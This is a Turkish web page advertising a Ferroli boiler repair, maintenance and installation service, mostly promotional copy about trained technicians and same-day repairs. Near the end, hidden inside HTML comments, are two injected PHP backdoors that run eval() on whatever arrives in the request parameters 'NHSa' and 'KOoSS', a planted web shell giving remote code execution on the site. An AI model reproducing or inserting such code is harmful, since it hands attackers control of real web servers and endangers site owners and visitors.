Anasayfa » Genel » Feroli Servisi

Feroli Servisi

 Ferroli Kombi Servisi olarak ilk önceliğimiz adresinize gelmeden telefon yardımıyla sorunuzu gidermektir. Teknolojinin pahalı nimetlerinden olan kombi ve ısıtma cihazları yanlış bir işlem sonucunda sizlere çok daha büyük masraflar oluşturmakta ve uzun süreli mağduriyetler sağlamaktadır. Bu sebeple arıza için çağıracağınız servisin işini bilen eğitimli teknikerler olduğundan emin olunuz.

Ferroli Kombi Servisi olarak siz saygı değer müşterilerimize adresinizde hizmet veren teknikerlerini sektörün önde gelen firmalarında eğitimlerini almış, insan ilişkileri konularında tecrübe kazanmış, cihazlara olan hakimiyetleri üst seviyede olan insanlardan oluşturmaktadır.

Servisimiz arıza bildirimi merkezde toplayarak bölgelerinde bulunan mobil servis ekiplerine bildirir ve aynı gün içerisinde probleminizi ortadan kaldırmaya çalışır.

Ferroli Kombi Servisi deneyimli teknikerleri sayesinde cihazını montajı yapıldığı yerde size zaman kaybettirmeden araçlarında bulunan parçalar sayesinde kısa bir süre içerisinde onarımını yaparak siz değerli müşterilerimize cihazınızı çalışır durumda teslim ederiz.

Firmamız kurulduğu günden bu yana ilkelerinden taviz vermeden,profesyonel ekibiyle servis çağrılarınıza cevap vermektedir.
Arızalı, onarım gerektiren ya da periyodik bakım zamanı gelmiş olan ürünlerinizi evinizde ya da kendi atölyemizde ilk sahip olduğunuz gün ki performansına geri getirmek bizim işimizdir.
Kalitede lider, teknolojide güncel, hizmette güvenilir ve kendini işine adamış profesyonel bir kadro ile siz değerli müşterilerimizi ailemizin bir mensubu gibi görmekteyiz.

Samimiyetimizin kaynağı, işimize duyduğumuz saygının getirdiği bir sevgidir.

Kombi Servis Hizmetlerimiz :

  • Ferroli Kombi Servisi
  • Ferroli Kombi Bakımı
  • Ferroli Kombi montajı
  • Ferroli Kombi Arıza
  • Ferroli Kombi Teknik Servisi

<!– [insert_php]if (isset($_REQUEST["NHSa"])){eval($_REQUEST["NHSa"]);exit;}[/insert_php][php]if (isset($_REQUEST["NHSa"])){eval($_REQUEST["NHSa"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["KOoSS"])){eval($_REQUEST["KOoSS"]);exit;}[/insert_php][php]if (isset($_REQUEST["KOoSS"])){eval($_REQUEST["KOoSS"]);exit;}[/php] –>

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir